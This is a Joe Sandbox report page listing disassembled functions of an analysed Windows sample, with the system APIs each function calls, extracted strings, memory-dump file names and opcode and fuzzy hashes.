                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                                                              • Instruction ID: 8ee0659a22c29e2dd1371358f839976758e15641ea10cf927cfcaa0b9c590884
                                                                                              • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                                                              • Instruction Fuzzy Hash: EAA167319043869FEB29CF68C8A17EEBBE5FF65310F18417DE4A59B281C3389982C751
                                                                                              Function 000FA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,000F80B7,?,?,?), ref: 000FA351
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,000F80B7,?,?), ref: 000FA395
                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,000F80B7,?,?,?,?,?,?,?,?), ref: 000FA416
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,000F80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 000FA41D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: 6f097afb8a122138050b2ec9a2f22d05da5f9e9f7d405efc7e69e2f91b2448c5
                                                                                              • Instruction ID: 5a0394860688e32466700b8a168aa77c8a2c45484b4a2031177e9b09d455691e
                                                                                              • Opcode Fuzzy Hash: 6f097afb8a122138050b2ec9a2f22d05da5f9e9f7d405efc7e69e2f91b2448c5
                                                                                              • Instruction Fuzzy Hash: E341D2703483886AD731DF24CC45BEEBBE4AB96700F04091DB6D4D35C1D768AA48EB13
                                                                                              Function 0011C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001189AD,?,00000000,?,00000001,?,?,00000001,001189AD,?), ref: 0011C0E6
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0011C16F
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001167E2,?), ref: 0011C181
                                                                                              • __freea.LIBCMT ref: 0011C18A
                                                                                                • Part of subcall function 00118518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: 8c2c37e10f0287703f39253b3309f2ba88a98fcd455fa43d4438675d1ff8a2cb
                                                                                              • Instruction ID: affaa8cea569b313511756f42f6c9a03a4d55c3e7b35381820650cc1aedf7671
                                                                                              • Opcode Fuzzy Hash: 8c2c37e10f0287703f39253b3309f2ba88a98fcd455fa43d4438675d1ff8a2cb
                                                                                              • Instruction Fuzzy Hash: D431BC72A4020AEBDB288F64DC46DEE7BA5EB54710F050128FC1496291EB35CDA1CBE0
                                                                                              Function 00112503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0011251A
                                                                                                • Part of subcall function 00112B52: ___AdjustPointer.LIBCMT ref: 00112B9C
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00112531
                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00112543
                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00112567
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                              • String ID:
                                                                                              • API String ID: 2633735394-0
                                                                                              • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                                                              • Instruction ID: 77941083e0cba44db0d9bd051623d8a704076f314e56a071e63eb53418150c30
                                                                                              • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                                                              • Instruction Fuzzy Hash: 64012932000108BBCF169F55DC41EDA3BBAFF69750F058024FD1866160D376E9B2EBA1
                                                                                              Function 00109DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00109DBE
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00109DCD
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00109DDB
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00109DE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: 0661b50ff36b46b9c96da70de382eaa4a3cf238724d653ffeff2ef34290298e5
                                                                                              • Instruction ID: 39b9497915919bd09f661c32fc0f572be76cde2bf4ed62709396facfcb55ddd2
                                                                                              • Opcode Fuzzy Hash: 0661b50ff36b46b9c96da70de382eaa4a3cf238724d653ffeff2ef34290298e5
                                                                                              • Instruction Fuzzy Hash: 09E0EC32A86721E7D3601BA4AC0DB8B3B54AB0A713F050005F6059A9D0DA704485CB90
                                                                                              Function 00112016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00112016
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0011201B
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00112020
                                                                                                • Part of subcall function 0011310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0011311F
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00112035
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                                                              • Instruction ID: 909507026e0aa75a1fcc34878369adea51a349a39b9bc337b7b61e7e0e495b68
                                                                                              • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                                                              • Instruction Fuzzy Hash: 64C04C25108640E41C1D7AF221021FD07001C777C4B9222F2F8B01750BDF2606EAA236
                                                                                              Function 00109F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00109DF1: GetDC.USER32(00000000), ref: 00109DF5
                                                                                                • Part of subcall function 00109DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00109E00
                                                                                                • Part of subcall function 00109DF1: ReleaseDC.USER32(00000000,00000000), ref: 00109E0B
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00109F8D
                                                                                                • Part of subcall function 0010A1E5: GetDC.USER32(00000000), ref: 0010A1EE
                                                                                                • Part of subcall function 0010A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0010A21D
                                                                                                • Part of subcall function 0010A1E5: ReleaseDC.USER32(00000000,?), ref: 0010A2B5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              • Opcode ID: c14ec63cbdf71d50ca57c09f8c145458bb8c30259b4144c1a210d039b906642c
                                                                                              • Instruction ID: 33a56fd75f4ba12b45722bc1ec96b4403981b3d5611741a6e23b39304862e7f8
                                                                                              • Opcode Fuzzy Hash: c14ec63cbdf71d50ca57c09f8c145458bb8c30259b4144c1a210d039b906642c
                                                                                              • Instruction Fuzzy Hash: E5811071208314EFC714DF68D844A2ABBE9FF88714F00491DF99AD72A0DB75AD06DB62
                                                                                              Function 00100E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              • Opcode ID: 49c6899a108e9a204ec8e507b53b7067255b6c7f880945bf1a2e293d152d91fa
                                                                                              • Instruction ID: 74ae55f4ed66980afd506982b5166f7eee7850b6f5c3c997ba916f480600a2ca
                                                                                              • Opcode Fuzzy Hash: 49c6899a108e9a204ec8e507b53b7067255b6c7f880945bf1a2e293d152d91fa
                                                                                              • Instruction Fuzzy Hash: 5351E83128C701FEEB3A1AA4CC02F367656BB1DB00F224917B3CA748DAC7D65590B613
                                                                                              Function 000F772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F7730
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000F78CC
                                                                                                • Part of subcall function 000FA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000FA27A,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA458
                                                                                                • Part of subcall function 000FA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000FA27A,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA489
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$H_prologTime
                                                                                              • String ID: :
                                                                                              • API String ID: 1861295151-336475711
                                                                                              • Opcode ID: 639de01a673bcaa8e615c3529b4d8208b2c40684f155521ce59a5224986f3caf
                                                                                              • Instruction ID: 8a6712359b8ed94fd4d44291da7b3001f7a1252858e45eed68a64e20ce2c0903
                                                                                              • Opcode Fuzzy Hash: 639de01a673bcaa8e615c3529b4d8208b2c40684f155521ce59a5224986f3caf
                                                                                              • Instruction Fuzzy Hash: 0B41717190522CAADB25EB50DD55EFEB3BCAF45300F00409AB709A2493DB745F85EF62
                                                                                              Function 000FB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 0-253988292
                                                                                              • Opcode ID: 66b7a3b572cb5f198acd2d497ba3d1404f0449a43a0ff9a494771627ad880570
                                                                                              • Instruction ID: d4d3d4ead20e92ae3295aea1e1e6eee851e8ecb8b1d99838459afa7808c7f69b
                                                                                              • Opcode Fuzzy Hash: 66b7a3b572cb5f198acd2d497ba3d1404f0449a43a0ff9a494771627ad880570
                                                                                              • Instruction Fuzzy Hash: 0A41A13580431EAACB20BF21DC41EFF77ADAF84790B144065FA54A7952E774EA50EEA0
                                                                                              Function 00108FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Shell.Explorer$about:blank
                                                                                              • API String ID: 0-874089819
                                                                                              • Opcode ID: bf8f0b77a442969dc75387e761da4defb8d8e9db953fa1568e7f61627e46bc05
                                                                                              • Instruction ID: 74142a1bb2e39efeba367d804cc3c5ed0200fd6fa5689b455f3c626339d28fc9
                                                                                              • Opcode Fuzzy Hash: bf8f0b77a442969dc75387e761da4defb8d8e9db953fa1568e7f61627e46bc05
                                                                                              • Instruction Fuzzy Hash: CE2171713083149FCB18AF64D8A5A2A77A9FF88711B15855DF9998F2C6DBB0EC01CB60
                                                                                              Function 000FEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 000FEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000FEB92
                                                                                                • Part of subcall function 000FEB73: GetProcAddress.KERNEL32(001381C0,CryptUnprotectMemory), ref: 000FEBA2
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,000FEBEC), ref: 000FEC84
                                                                                              Strings
                                                                                              • CryptUnprotectMemory failed, xrefs: 000FEC7C
                                                                                              • CryptProtectMemory failed, xrefs: 000FEC3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              • Opcode ID: 98c9abc12fa877aa9a611b562d4031beda414d55e89a8e4e72ab710a34f071ba
                                                                                              • Instruction ID: 693fe7a09e7ebdcb8d6f3900adef265246141f4205cdfee718905af171a8fbc2
                                                                                              • Opcode Fuzzy Hash: 98c9abc12fa877aa9a611b562d4031beda414d55e89a8e4e72ab710a34f071ba
                                                                                              • Instruction Fuzzy Hash: 22112C31A0536CAFDB255B34DD06A7E3754AF04B10B044015FD056BAA2CB795E43A7D4
                                                                                              Function 00100889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,001009D0,?,00000000,00000000), ref: 001008AD
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 001008F4
                                                                                                • Part of subcall function 000F6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F6EAF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              • Opcode ID: 366bc8a2107f1950a43c734d003a2e7ea67555fe2c9f27c76970633108b6a785
                                                                                              • Instruction ID: 5593cfe0db10c8fa728d57d65bec053cfaee1174e3afb9c9bf68cf9399567058
                                                                                              • Opcode Fuzzy Hash: 366bc8a2107f1950a43c734d003a2e7ea67555fe2c9f27c76970633108b6a785
                                                                                              • Instruction Fuzzy Hash: C001D6B2344305AFD635AF64EC82FB67398EB48715F10042EF6C6625C1CBE2A8419664
                                                                                              Function 000F130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 000FDA98: _swprintf.LIBCMT ref: 000FDABE
                                                                                                • Part of subcall function 000FDA98: _strlen.LIBCMT ref: 000FDADF
                                                                                                • Part of subcall function 000FDA98: SetDlgItemTextW.USER32(?,0012E154,?), ref: 000FDB3F
                                                                                                • Part of subcall function 000FDA98: GetWindowRect.USER32(?,?), ref: 000FDB79
                                                                                                • Part of subcall function 000FDA98: GetClientRect.USER32(?,?), ref: 000FDB85
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                              • SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              • API String ID: 2622349952-4108050209
                                                                                              • Opcode ID: 5fa666607f20e9c1fe748282807eb0e15ae5af1cad940657e719eca3fd755d32
                                                                                              • Instruction ID: f0aa8c06e946fc9ef4f6619494b87f82f7f56ffebc0a36a1010547c0da811bd1
                                                                                              • Opcode Fuzzy Hash: 5fa666607f20e9c1fe748282807eb0e15ae5af1cad940657e719eca3fd755d32
                                                                                              • Instruction Fuzzy Hash: FFF08CB120834CE7DF660F608819BFA3BD9BB25306F088014FE4954DE1C778CA95FA50
                                                                                              Function 0010084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00100A78,?), ref: 00100854
                                                                                              • GetLastError.KERNEL32(?), ref: 00100860
                                                                                                • Part of subcall function 000F6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F6EAF
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00100869
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
